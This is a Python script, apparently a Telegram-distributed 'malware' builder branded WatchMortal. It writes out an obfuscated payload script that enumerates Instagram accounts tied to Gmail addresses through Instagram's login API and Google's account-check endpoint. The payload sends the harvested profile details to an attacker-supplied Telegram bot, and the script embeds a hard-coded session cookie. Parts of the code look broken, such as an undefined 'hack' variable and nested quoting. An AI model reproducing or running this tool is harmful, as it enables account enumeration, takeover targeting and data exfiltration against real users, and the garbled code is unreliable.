import requests
from datetime import datetime
import os
import time
from colorama import Fore, Style, init

os.system('pip install emojify')

E = '\033[1;31m'
B = '\033[1;36m'
G = '\033[1;32m'
S = '\033[1;33m'
W = '\033[1;97m'

os.system('clear')


print(Style.RESET_ALL)
print(Style.BRIGHT)
print(Fore.GREEN)
print('''
          ▐▮▌ ▞▖ ▙ ▚▞▚▞ ▞▖ █▘ █☰                                                                                                 
  
         -   𝐌𝐚𝐥𝐰𝐚𝐫𝐞   -  V = 2.1   ''')

print(f'''      {B}{E}==============================
      |{G}[+] GitHub    : {B} WatchMortal   {E}|
      |{G}[+] Developer : {B} WatchMortal     {E}|
      |{G}[+] TeleGram  : {B} WatchMortalhack {E}|
      {E}==============================''')
print('               M A L W A R E                     ')      
print('''\033[1;34m        https://t.me/WatchMortalhack       
       https://github.com/WatchMortal\n\n''')    

print('\033[1;35m    You must subscribe to this channel   \n')              
#os.system(f'xdg-open https://t.me/WatchMortalhack')
time.sleep(3)       
os.system(f'xdg-open https://t.me/WatchMortalhack')
time.sleep(3)
   
id=input(W+f'  [{E} ** {W}]  {S}Telegram ID ==> {B}')
token=input(W+f'  [{E} ** {W}]  {S}Token Bot ==> {B}')

print(f'      {E}==============================')

skript = str(f"""import os
os.system('pip install requests')
os.system('clear')
import requests
from datetime import datetime

import webbrowser
webbrowser.open('https://t.me/WatchMortal1')
try:
	import requests
	import socket
	import webbrowser
	import random 
	from uuid import uuid4
	uid = uuid4()
	uis = str(uuid4())
	import os
	import time
	import json
	import instaloader
	from user_agent import generate_user_agent
except ModuleNotFoundError:
	os.system('pip install requests')
	os.system('pip install socket')
	os.system('pip install instaloader')
	os.system('pip install webbrowser')
	os.system('pip install os')
	os.system('pip install random')
	os.system('pip install time')
	os.system('pip install json')
	os.system("pip install uid")
	os.system('pip install users')
	os.system('pip install mechanize')
	os.system("pip install uuid")
	os.system('pip install requests')
	os.system('pip install socket')
	os.system('pip install instaloader')
	os.system('pip install webbrowser')
	os.system('pip install os')
	os.system('pip install random')
	os.system('pip install time')
	os.system('pip install json')
	os.system("pip install uid")
	os.system('pip install users')
	os.system('pip install mechanize')
	os.system("pip install uuid")
	os.system('pip install requests')
	os.system('pip install socket')
	os.system('pip install instaloader')
	os.system('pip install webbrowser')
	os.system('pip install os')
	os.system('pip install random')
	os.system('pip install time')
	os.system('pip install json')
	os.system("pip install uid")
	os.system('pip install users')
	os.system('pip install mechanize')
	os.system("pip install uuid")
	os.system('pip install requests')
	os.system('pip install socket')
	os.system('pip install instaloader')
	os.system('pip install webbrowser')
	os.system('pip install os')
	os.system('pip install random')
	os.system('pip install time')
	os.system('pip install json')
	os.system("pip install uid")
	os.system('pip install users')
	os.system('pip install mechanize')
	os.system("pip install uuid")
	os.system('pip install requests')
	os.system('pip install socket')
	os.system('pip install instaloader')
	os.system('pip install webbrowser')
	os.system('pip install os')
	os.system('pip install random')
	os.system('pip install time')
	os.system('pip install json')
	os.system("pip install uid")
	os.system('pip install users')
	os.system('pip install mechanize')
	os.system("pip install uuid")
	os.system('pip install requests')
	os.system('pip install socket')
	os.system('pip install instaloader')
	os.system('pip install webbrowser')
	os.system('pip install os')
	os.system('pip install random')
	os.system('pip install time')
	os.system('pip install json')
	os.system("pip install uid")
	os.system('pip install users')
	os.system('pip install mechanize')
	os.system("pip install uuid")
	os.system('pip install requests')
	os.system('pip install socket')
	os.system('pip install instaloader')
	os.system('pip install webbrowser')
	os.system('pip install os')
	os.system('pip install random')
	os.system('pip install time')
	os.system('pip install json')
	os.system("pip install uid")
	os.system('pip install users')
	os.system('pip install mechanize')
	os.system("pip install uuid")
	os.system('pip install requests')
	os.system('pip install socket')
	os.system('pip install instaloader')
	os.system('pip install webbrowser')
	os.system('pip install os')
	os.system('pip install random')
	os.system('pip install time')
	os.system('pip install json')
	os.system("pip install uid")
	os.system('pip install users')
	os.system('pip install mechanize')
	os.system("pip install uuid")
	os.system('pip install requests')
	os.system('pip install socket')
	os.system('pip install instaloader')
	os.system('pip install webbrowser')
	os.system('pip install os')
	os.system('pip install random')
	os.system('pip install time')
	os.system('pip install json')
	os.system("pip install uid")
	os.system('pip install users')
	os.system('pip install mechanize')
	os.system("pip install uuid")
	os.system('pip install requests')
	os.system('pip install socket')
	os.system('pip install instaloader')
	os.system('pip install webbrowser')
	os.system('pip install os')
	os.system('pip install random')
	os.system('pip install time')
	os.system('pip install json')
	os.system("pip install uid")
	os.system('pip install users')
	os.system('pip install mechanize')
	os.system("pip install uuid")
	os.system('pip install requests')
	os.system('pip install socket')
	os.system('pip install instaloader')
	os.system('pip install webbrowser')
	os.system('pip install os')
	os.system('pip install random')
	os.system('pip install time')
	os.system('pip install json')
	os.system("pip install uid")
	os.system('pip install users')
	os.system('pip install mechanize')
	os.system("pip install uuid")
	os.system('pip install requests')
	os.system('pip install socket')
	os.system('pip install instaloader')
	os.system('pip install webbrowser')
	os.system('pip install os')
	os.system('pip install random')
	os.system('pip install time')
	os.system('pip install json')
	os.system("pip install uid")
	os.system('pip install users')
	os.system('pip install mechanize')
	os.system("pip install uuid")
	os.system('clear')
	

import requests,colorama,mechanize
from tokenize import cookie_re
import requests
import requests,os,names,json,random
import requests,os,names,random,time
from user_agent import generate_user_agent
from uuid import uuid4
uid = uuid4()
import requests,random,mechanize,time
import requests,random,mechanize,datetime

now = datetime.datetime.today()

now = datetime.datetime.today()
mm = str(now.month)
dd = str(now.day)
yyyy = str(now.year)
hour = str(now.hour)
mi = str(now.minute)
ss = str(now.second)
t=(mm + "/" + dd + "/" + yyyy + " " + hour + ":" + mi + ":" + ss)


hours = (now.hour)
x = datetime.datetime.now()
g= datetime.datetime(2023, 6, 6, 20, 0 ,0)

if (x.strftime("%x"))>(g.strftime("%x")):
 print('\n\n')
 print("     "+'تم توقيف اداة راسل المبرمج لتفعيله @J_C_A')
 print('\n\n')
 print(x)

 

if (x.strftime("%x"))==(g.strftime("%x")):
   print('')
   if(x.strftime("%X"))>(g.strftime("%X")):
    print('\n\n')
    print("     "+'خلص اشتراك عليك مراجعة صانع اداة @J_C_A☄️🗿')
    print('\n\n')
    print(x)
    
    sys.exit(0)
   else:
    print('')  
else:
    print('')
print('')


os.system('clear')
import os,time,random,requests,json,sys
from user_agent import generate_user_agent
from uuid import uuid4
from time import sleep
import webbrowser, random, requests
from user_agent import generate_user_agent
import json
from secrets import token_hex
import secrets, sys
os.system('clear')
E = '\033[1;31m'
G = '\033[1;35m'
Z = '\033[1;31m' #احمر
M = '\033[1;33m' #اصفر
Z1 = '\033[2;31m' #احمر ثاني
F = '\033[2;32m' #اخضر
A = '\033[2;34m'#ازرق
C = '\033[2;35m' #وردي
B = '\033[2;36m'#سمائي
Y = '\033[1;34m' #ازرق فاتح
M = '\x1b[1;37m'#ابیض
S = '\033[1;33m'
U = '\x1b[1;37m'#ابیض
BRed = '\x1b[1;31m'
BGreen = '\x1b[1;32m'
BYellow = '\x1b[1;33m'
R = '\x1b[1;34m'
BPurple = '\x1b[1;35m'
BCyan = '\x1b[1;36m'
BWhite = '\x1b[1;37m'


#------------------------------[الالوان]------------------------------
Z = '\033[1;31m' #احمر
R = '\033[1;31m' #احمر
X = '\033[1;33m' #اصفر
F = '\033[2;32m' #اخضر
C = "\033[1;97m" #ابيض
B = '\033[2;36m'#سمائي
Y = '\033[1;34m' #ازرق فاتح.
E = '\033[1;31m'
B = '\033[2;36m'
G = '\033[1;32m'
S = '\033[1;33m'
C1 = '\033[2;35m'
#------------------------------[WatchMortal]------------------------------



os.system('clear')
import requests,random,pyfiglet,colorama
S = '\033[1;31m'
Z = '\033[1;32m'
E = '\033[1;33m'
print(E+str(pyfiglet.figlet_format('  Watch Mortal '))+f"\n")


print(f"{Z}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")

def azz(): 
 azro = (f'''
 {BCyan}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 {BWhite}       Saat » {x}
{BPurple}          Ş İ F͏ R͏ E͏ L͏ E͏ N͏ D͏ İ R͏ M͏ E͏ - S͏ İ S͏ T͏ E͏ M͏ İ - 2.0              
{BRed}                    
{BPurple}          Ş İ F͏ R͏ E͏ L͏ E͏ N͏ D͏ İ R͏ M͏ E͏ - S͏ İ S͏ T͏ E͏ M͏ İ - 2.0
 {BWhite}       Saat » {x}
{BCyan}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

{Z}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

 ''')
 for azr in azro.splitlines():
  time.sleep(0.01)
  print(azr)
azz()

user = "WatchMortal"
password = "WatchMortal"

while True:
    kullanici = input("Kullanıcı adınızı giriniz: ")
    parola = input("Şifrenizi giriniz: ")
    # ikisi de doğru
    if kullanici == user and parola == password:
        print("Hoşgeldiniz")
        break
    # kullanıcı adı doğru şifre yanlış
    elif kullanici == user and parola != password:
        print("Şifreniz yanlış\n")
    # şifre doğru kullacı adı yanlış
    elif kullanici != user and parola == password:
        print("Kullanıcı adınız yanlış \n")
    # ikisi de yanlış
    else:
        print("Kullanıcı adı ve şifre hatalı\n")

os.system('clear')


def azz(): 
 azro = (f'''
 {BWhite}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
{BYellow}                  ᴡᴀᴄᴛʜ ᴍᴏʀᴛᴀʟ
{BYellow}                     𝚈𝙰𝙿𝙸𝙼𝙲𝙸: @ᵂᵃᶜᵗʰ ᴹᵒʳᵗᵃˡ
{BYellow}            ᴋᴜsᴜʀsᴜᴢ ᴏʟᴍᴀᴋ ᴅᴏɢᴜşᴛᴀɴ ɢᴇʟᴇɴ ʙɪşᴇʏ ᴅᴇɢİʟᴅİʀ 😎🤟
{BWhite}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ''')
 for azr in azro.splitlines():
  time.sleep(0.01)
  print(azr)
azz()

uid = uuid4()
Name = str(input(X+'⌯ '+B+'İsmini Yaz '+C1+''+F))
if Name =='':
	exit(Z+'Böyle İsim Yok Knk')
os.system('clear')
time.sleep(1)
print(f'{B}⌯ {Z} Hoş Geldin {Name}  \n\n')

token = input(Z+'⌯ '+B+' ᴛᴏᴋᴇɴ ɢɪʀ  '+C1+'    » '+Y)

ID = input(Z+'⌯ '+B+'  ɪᴅ ɢİʀ  '+C1+' » '+Y)

sid = input(Z+'⌯ '+B+' ̳S̳̳e̳̳i̳̳s̳̳o̳̳n̳ ̳I̳̳d̳ ̳G̳̳i̳̳r̳  '+C1+' » '+Y)
print(B+' ⌯ '+X+' انتضر دتفحص '+X+'....')
tlg1 =(f"""
 Vip Kullanıcısı H.g :D {Name}  
⊶⊶⊶⊶⊷⊷⊷⊷⊶⊶⊶⊶⊷⊷⊷⊷⊶⊶⊶⊶⊷⊷⊷⊷⊶⊶⊶⊶⊷
𝙺𝚗𝚔 Ö𝚗𝚌𝚎𝚕𝚒𝚔𝚕𝚎 𝙷𝚘ş 𝙶𝚎𝚕𝚍𝚒𝚗 𝙱𝚒𝚛𝚊𝚣𝚍𝚊𝚗 𝙳𝚞ş𝚎𝚛 𝙱𝚘𝚝𝚊 𝚎𝚔𝚜𝚒𝚔𝚜𝚒𝚣 𝚢𝚊𝚙𝚝ı𝚢𝚜𝚊𝚗
⊶⊶⊶⊶⊷⊷⊷⊷⊶⊶⊶⊶⊷⊷⊷⊷⊶⊶⊶⊶⊷⊷⊷⊷⊶⊶⊶⊶⊷
B Y : @WatchMortalHack    """)


requests.get("https://api.telegram.org/bot"+str(token)+"/sendMessage?chat_id="+str(ID)+"&text="+str(tlg1))


YY =0
head={'Cookie':'mid=YvvDrAALAAFLJor2N0MGQgLWW0UW; ig_did=A837F007-F7BC-4802-8EF0-A68D997C297D; ig_nrcb=1; datr=nGUPYz2GPkoNMu7UWgKcsp8x; csrftoken=ZUyjsgp9hIYl4CfqYu7ilo6ZEgv2gl2Z; ds_user_id=5376288835; shbid="14120\0545376288835\0541695151496:01f736544db5dcfedc306d753acc4c86d0c42f55fdf7c5941c9c39c6edf1a239cafb04a2"; shbts="1663615496\0545376288835\0541695151496:01f7487ad9bfa5a41605905bf69300e6d01dcca404a38a4f43c2b140c3c002789b13493e"; sessionid='+sid}
def check(email,user): 
 user=str(user)
 email=str(email)

 global YY
 url='https://i.instagram.com/api/v1/accounts/login/'
 headers = {'User-Agent':'Instagram 136.0.0.34.124 Android (28/9.0; 640dpi; 1440x2560; samsung; SM-G965F; star2qltecs; samsungexynos9810; en_US)',  'Accept':'*/*',
                 'Cookie':'missing',
                 'Accept-Encoding':'gzip, deflate',
                 'Accept-Language':'en-US',
                 'X-IG-Capabilities':'3brTvw==',
                 'X-IG-Connection-Type':'WIFI',
                 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
              'Host':'i.instagram.com'}
 data = {'uuid':uid,  'password':'@whisper666',
              'username':email,
              'device_id':uid,
              'from_reg':'false',
              '_csrftoken':'missing',
              'login_attempt_countn':'0'}

 req= requests.post(url, headers=headers, data=data).json()
 if req['message'] == 'The password you entered is incorrect. Please try again.':
   rr=requests.get(f'https://www.instagram.com/{user}/?__a=1&__d=dis',headers=head).json()  
   nam = str(rr['graphql']['user']['full_name'])
   iddd = str(rr['graphql']['user']['id'])
   fol = str(rr['graphql']['user']['edge_followed_by']['count'])
   fols =str(rr['graphql']['user']['edge_follow']['count'])
   isp = str(rr['graphql']['user']['is_private'])
   bio = str(rr['graphql']['user']['edge_owner_to_timeline_media']['count'])
   re = requests.get(f"https://o7aa.pythonanywhere.com/?id={iddd}")   
   ree = re.json()
   dat = ree['date']
   
   
   


   YY+=1
   tlg =(f"""
ʜᴇʟʟᴏ {Name} ʏᴇɴɪ ʜᴇᴤᴀᴘ ⤋ 

𓊆👇ʏᴇɴɪ ʜᴇᴤᴀᴘ ᴅüşᴛü ʙᴀᴋ ᴋɴᴋ👇𓊇

 ⋘────━🇹🇷Watch Mortal 🇹🇷━────⋙ 

⌯ ɴᴜᴍᴀʀᴀᴤı » {YY} 
⌯ İᴤᴍɪ » {nam} 
⌯ ᴋᴜʟʟᴀɴıᴄı ᴀᴅı » {user} 
⌯ ᴇᴍᴀɪʟ » {email} 
⌯ ʜᴇᴤᴀᴘ ɪᴅ » {iddd} 
⌯ ᴛᴀᴋɪᴘçɪ » {fol} 
⌯ ᴛᴀᴋɪᴘ » {fols} 
⌯ ᴅᴏɢʀᴜʟᴀᴍᴀ ᴀçıᴋ/ᴅᴏɢʀᴜʟᴀᴍᴀ ᴋᴀᴘᴀʟı » {isp} 
⌯ ᴀçıʟᴍᴀ ᴛᴀʀɪʜɪ » {dat} 
⌯ ʙɪᴏ » {bio} 
⌯ ᴤᴀᴀᴛ » {x} ⌯ ʟɪɴᴋ » https://www.instagram.com/{user}

 ⋘─────━🇹🇷Watch Mortal 🇹🇷━─────⋙ 
 
 ʙʏ : @WatchMortalHack =  🇹🇷🙂🥰🇹🇷   """)
   print(C1+tlg)
   
   
   requests.get("https://api.telegram.org/bot"+str(token)+"/sendMessage?chat_id="+str(ID)+"&text="+str(tlg))
 if req['message'] == "The username you entered doesn't appear to belong to an account. Please check your username and try again.":
   print(f'{X} ÇÖP IG KNK {F} : {Z} {email}')
   

def yahoo(email,user):
  global i
  
  
  eml=str(email)
  email=eml.split('@')[0]+'@gmail.com'
  url = 'https://android.clients.google.com/setup/checkavail'
  h = {
    'Content-Length':'98',
    'Content-Type':'text/plain; charset=UTF-8',
    'Host':'android.clients.google.com',
    'Connection':'Keep-Alive',
    'user-agent':'GoogleLoginService/1.3(m0 JSS15J)',
    }
  d = json.dumps({
    'username':email,
    'version':'3',
    'firstName':'AbaLahb',
    'lastName':'AbuJahl'
  })
  res = requests.post(url,data=d,headers=h)
  if res.json()['status'] == 'SUCCESS':
    print(f'{X} İYİ AMA SÖKMEZ{Z} : {C} {email}')
    check(email,user)
  else:
    print(f'{F} ÇÖP GMAİL AGA {Z} : {F} {email}')
def users():
 while True:
#  mal=['male','femal']
#  gen=random.choice(mal)
  user='1234567890qwertyuiopasdfghjklzxcvbnm.'
  num='6789'
  rng=int("".join(random.choice(num)for i in range(1)))
  name=str("".join(random.choice(user)for i in range(rng)))
  whisper=requests.get(f'https://www.instagram.com/web/search/topsearch/?context=blended&query={name}',headers=head).json()
  mn=0
  try:
   while True:
    mn += 1
    user=str(whisper['users'][mn]['user']['username'])
    emai=user
    email=emai+'@gmail.com'
    if '_' in str(email):
      
      continue
    else :
      
      yahoo(email,user)
  except IndexError:
   users()
users()


print(W+f'''  [{E} 01 {W}] Attack Image Hack ..... 
{W}  [{E} 02 {W}] Attack infrmation System ....''')
print('')

black = int(input(W+' [ × ] '+'\033[1;35m  Enter opation : '+G))
print('\n')

if black == 1:
    namee=input(W+f'  [{E} ** {W}]  {S}Name Skript ==> {B}')
    with open(f'enc_{namee}.py','w') as code:
        code.write(skript)
        
elif black == 2:
    namee=input(W+f'  [{E} ** {W}]  {S}Name Skript ==> {B}')
    with open(f'enc_{namee}.py','w') as co:
        co.write(hack)   
else:
     exit(' E R O R R E ') 

os.system(f'emojify --input enc_{namee}.py --output {namee}.py --emoji')
os.system(f'rm -rf enc_{namee}.py')

print(f'    {G} ✅ DONE SAVE IN {namee}.py ✅ ')                                                      
